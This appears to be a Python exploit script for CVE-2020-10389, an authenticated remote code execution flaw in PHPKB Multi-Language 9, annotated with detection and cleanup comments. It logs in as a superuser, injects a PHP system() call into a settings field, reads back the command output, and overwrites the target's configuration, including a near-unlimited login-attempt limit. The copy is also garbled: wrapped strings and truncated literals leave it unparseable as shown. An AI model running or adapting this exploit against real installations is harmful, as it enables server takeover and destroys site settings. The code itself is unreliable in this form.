# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389
#!/usr/bin/env python3
import argparse
import requests
# Parsing arguments
# NOTE: this copy is line-wrapped (the description and help strings below are
# split across physical lines), so the file does not parse as-is; it is kept
# verbatim here as a reference artifact rather than repaired.
parser = argparse.ArgumentParser(description="Exploiting
CVE-2020-10389 - Authenticated Remote Code Execution in Chadha
PHPKB Standard Multi-Language 9 in admin/save-settings.php")
# url: base path of the PHPKB install. username/password: superuser
# credentials -- the issue is post-authentication, so exposure is bounded by
# who holds admin credentials and by how well those are protected.
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="Superuser
username")
parser.add_argument("password", type=str, help="Superuser
password")
# cmd is embedded verbatim into the request built further down.
parser.add_argument("cmd", type=str, help="The command you want
executed")
args = parser.parse_args()
# Perform login
# A requests.Session carries the PHPKB session cookie so the later admin
# POSTs are authenticated. The response body (.text) is read and discarded:
# a failed login is not detected and the script proceeds regardless.
# Detection note: the client sends requests' default User-Agent (nothing here
# overrides it), and a scripted login followed within seconds by a
# manage-settings.php POST is not normal admin behaviour.
session = requests.Session()
session.post(args.url + "/admin/login.php", data={'phpkb_username':
args.username, 'phpkb_password': args.password, 'login':
'LOGIN'}).text
# Sending exploit code and downloading the file
# The value is a PHP source fragment: the leading single quote appears
# intended to close a quoted string in the generated settings file, with the
# supplied command concatenated in through system(). That only works if the
# settings handler writes submitted values into PHP code unescaped
# (presumably admin/include/configuration.php, which is fetched below).
# Defensive takeaway: configuration must be stored as data (database, JSON or
# serialized file) or written with proper escaping, and an enumerated field
# such as putdown_for_maintenance should be validated against its allowed
# values before it is persisted.
exp = """' . system("{}") . '""".format(args.cmd)
# A complete settings form is re-submitted with fixed values, so running this
# overwrites the target's real configuration (database credentials, tool
# paths, mail settings), not just the injected field; the "reset" POST further
# down re-sends these same values, so the original settings are not restored.
# NOTE: the literal is truncated in this copy (it ends mid-string at
# "kb_meta_keywords"), so the statement is unterminated as shown.
data = {"putdown_for_maintenance": "no{}".format(exp), "kbname":
"test", "kburl": "http://localhost/phpkb", "kb_access":
"unrestricted", "extended_support_license_key": '', "mail_server":
"default", "smtp_hostname": '', "smtp_username": '',
"smtp_password": '', "smtp_port": '', "encryption_method": "None",
"emails_debug_mode": "0", "emails_debug_output": "error_log",
"send_mails_from": '', "test_email": '', "mysqlserver":
"127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass",
"mysqldatabase": "test", "kb_layout": "fluid",
"category_tree_width": "3", "sidebar_orientation": "left",
"category_tree_layout": "normal", "show_tree_articles": "yes",
"category_articles_count": "show", "categories_display_order":
"Alphabetic", "home_theme": "modern", "home_search_layout":
"default", "categories_layout_theme": "carousel",
"show_categories_cols": "3", "category_title_size": "normal",
"home_articles_layout": "tabbed", "display_featured": "yes",
"featured_count": "5", "display_popular": "yes", "popular_count":
"5", "display_rated": "yes", "rated_count": "5", "display_recent":
"yes", "recent_count": "5", "enable_subscribe_kb": "yes",
"kb_subscribe_theme": "minimal", "category_articles_layout":
"default", "category_page_records_default": "10",
"category_page_records_minimal": "10", "articles_sortby":
"Popularity", "articles_sortorder": "Descending",
"enable_subscribe_category": "yes", "enable_news_page": "yes",
"display_homepage_news": "yes", "number_homepage_news": "5",
"enable_login_page": "yes", "enable_glossary_page": "yes",
"enable_contact_page": "yes", "send_contact_email": "yes",
# The French text in the next value is an anti-spam e-mail cloaking artifact
# from the page this copy was taken from; it replaced whatever address the
# original script carried.
"contact_email_address": "Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.",
"enable_instant_suggestions": "yes", "minimum_question_characters":
"60", "default_search": "Articles", "search_in_articles": "All",
"search_in_others": "Both", "search_filter": "Any Word",
"display_recentviewed": "yes", "recentviewed_count": "5",
"display_popular_searches": "yes", "popularsearch_count": "5",
"article_page_theme": "default", "article_sidebar_content":
"related", "enable_add_favorite": "yes", "enable_print_article":
"yes", "enable_email_article": "yes", "enable_exportto_msword":
"yes", "enable_exportto_pdf": "yes", "enable_subscribe_article":
"yes", "enable_custom_fields": "yes", "enable_article_rating":
"yes", "enable_article_hits": "yes", "enable_article_author":
"yes", "show_author_email": "yes", "enable_related_articles":
"yes", "number_related_articles": "10",
"show_related_articles_randomly": "yes", "enable_article_feedback":
"yes", "enable_article_comments": "yes",
"existing_comments_visibility": "hide", "show_comments_to": "all",
"comments_sortorder": "Descending", "email_privacy_protection":
"yes", "article_meta_source": "article title",
"notify_pending_comment_superuser": "yes",
"notify_approved_comment_user": "yes", "schema_publisher_name": '',
"schema_publisher_logo": '', "enable_rss_feed": "yes",
"enable_rss_featured_feed": "yes", "enable_rss_popular_feed":
"yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed":
# number_login_attempts is set to 2**63-1, which (if the application honours
# it) effectively disables login lockout; restoring the previous value is
# part of cleanup after any incident involving this script.
"yes", "enable_rss_related_feed": "yes", "number_login_attempts":
"9223372036854775807", "login_delay": "5", "maxfilesize": "10240",
"kb_allowed_upload_file_types":
"gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt",
"searching_method": "0", "fulltext_mode": "0",
"searchresultsperpage": "10", "enable_search_files": "yes",
"doc_path": "C:\\antiword\\antiword.exe", "ppt_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe",
"index_attachment": "yes", "enable_autosave": "yes",
"autosave_interval": "120000", "use_wysiwyg_editor": "yes",
"enable_version_history": "yes", "enable_captcha": "yes",
"captcha_type": "default", "recaptcha_site_key": '',
"recaptcha_secret_key": '', "syntax_highlighter_theme":
"shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path":
"lol", "pdf_header": '', "pdf_footer_type": "default",
"pdf_page_numbers": "yes", "pdf_page_number_position": "Left",
"pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, ke
url = args.url + "/admin/manage-settings.php"
# The POST persists the settings form; the GET that follows fetches
# admin/include/configuration.php directly, which -- inferred from the flow,
# the server side is not shown -- is the generated file in which the injected
# fragment would run and where the command output is expected to appear.
# Detection: a direct request for admin/include/configuration.php, or a
# manage-settings.php POST whose putdown_for_maintenance value is anything
# beyond a short yes/no token, is a strong indicator of this technique;
# integrity monitoring on that file catches the modification itself.
session.post(url, data=data)
print(session.get(args.url +
"admin/include/configuration.php").text.encode('utf-8'))
# Resetting settings
# NOTE: this "reset" re-sends the identical form with the injection removed,
# but "no{}" is left as a literal (.format is never called here), so the
# stored maintenance flag ends up as the string "no{}" -- a residual artifact
# a forensic review can look for. The target is also left with these
# hard-coded values (root/DummyPass database credentials, XAMPP tool paths,
# the 2**63-1 login-attempt limit), not its pre-exploit configuration;
# restore settings from a known-good backup rather than relying on this step.
# The literal is truncated in this copy (it ends at "kb), so the statement is
# unterminated as shown and the final POST is syntactically inside it.
data = {"putdown_for_maintenance": "no{}", "kbname": "test",
"kburl": "http://localhost/phpkb", "kb_access": "unrestricted",
"extended_support_license_key": '', "mail_server": "default",
"smtp_hostname": '', "smtp_username": '', "smtp_password": '',
"smtp_port": '', "encryption_method": "None", "emails_debug_mode":
"0", "emails_debug_output": "error_log", "send_mails_from": '',
"test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername":
"root", "mysqlpswd": "DummyPass", "mysqldatabase": "test",
"kb_layout": "fluid", "category_tree_width": "3",
"sidebar_orientation": "left", "category_tree_layout": "normal",
"show_tree_articles": "yes", "category_articles_count": "show",
"categories_display_order": "Alphabetic", "home_theme": "modern",
"home_search_layout": "default", "categories_layout_theme":
"carousel", "show_categories_cols": "3", "category_title_size":
"normal", "home_articles_layout": "tabbed", "display_featured":
"yes", "featured_count": "5", "display_popular": "yes",
"popular_count": "5", "display_rated": "yes", "rated_count": "5",
"display_recent": "yes", "recent_count": "5",
"enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal",
"category_articles_layout": "default",
"category_page_records_default": "10",
"category_page_records_minimal": "10", "articles_sortby":
"Popularity", "articles_sortorder": "Descending",
"enable_subscribe_category": "yes", "enable_news_page": "yes",
"display_homepage_news": "yes", "number_homepage_news": "5",
"enable_login_page": "yes", "enable_glossary_page": "yes",
"enable_contact_page": "yes", "send_contact_email": "yes",
# Same e-mail cloaking artifact as in the first form; the original address
# is not recoverable from this copy.
"contact_email_address": "Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.",
"enable_instant_suggestions": "yes", "minimum_question_characters":
"60", "default_search": "Articles", "search_in_articles": "All",
"search_in_others": "Both", "search_filter": "Any Word",
"display_recentviewed": "yes", "recentviewed_count": "5",
"display_popular_searches": "yes", "popularsearch_count": "5",
"article_page_theme": "default", "article_sidebar_content":
"related", "enable_add_favorite": "yes", "enable_print_article":
"yes", "enable_email_article": "yes", "enable_exportto_msword":
"yes", "enable_exportto_pdf": "yes", "enable_subscribe_article":
"yes", "enable_custom_fields": "yes", "enable_article_rating":
"yes", "enable_article_hits": "yes", "enable_article_author":
"yes", "show_author_email": "yes", "enable_related_articles":
"yes", "number_related_articles": "10",
"show_related_articles_randomly": "yes", "enable_article_feedback":
"yes", "enable_article_comments": "yes",
"existing_comments_visibility": "hide", "show_comments_to": "all",
"comments_sortorder": "Descending", "email_privacy_protection":
"yes", "article_meta_source": "article title",
"notify_pending_comment_superuser": "yes",
"notify_approved_comment_user": "yes", "schema_publisher_name": '',
"schema_publisher_logo": '', "enable_rss_feed": "yes",
"enable_rss_featured_feed": "yes", "enable_rss_popular_feed":
"yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed":
"yes", "enable_rss_related_feed": "yes", "number_login_attempts":
"9223372036854775807", "login_delay": "5", "maxfilesize": "10240",
"kb_allowed_upload_file_types":
"gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt",
"searching_method": "0", "fulltext_mode": "0",
"searchresultsperpage": "10", "enable_search_files": "yes",
"doc_path": "C:\\antiword\\antiword.exe", "ppt_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe",
"index_attachment": "yes", "enable_autosave": "yes",
"autosave_interval": "120000", "use_wysiwyg_editor": "yes",
"enable_version_history": "yes", "enable_captcha": "yes",
"captcha_type": "default", "recaptcha_site_key": '',
"recaptcha_secret_key": '', "syntax_highlighter_theme":
"shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path":
"lol", "pdf_header": '', "pdf_footer_type": "default",
"pdf_page_numbers": "yes", "pdf_page_number_position": "Left",
"pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2,
keyword3", "kb
session.post(url, data=data)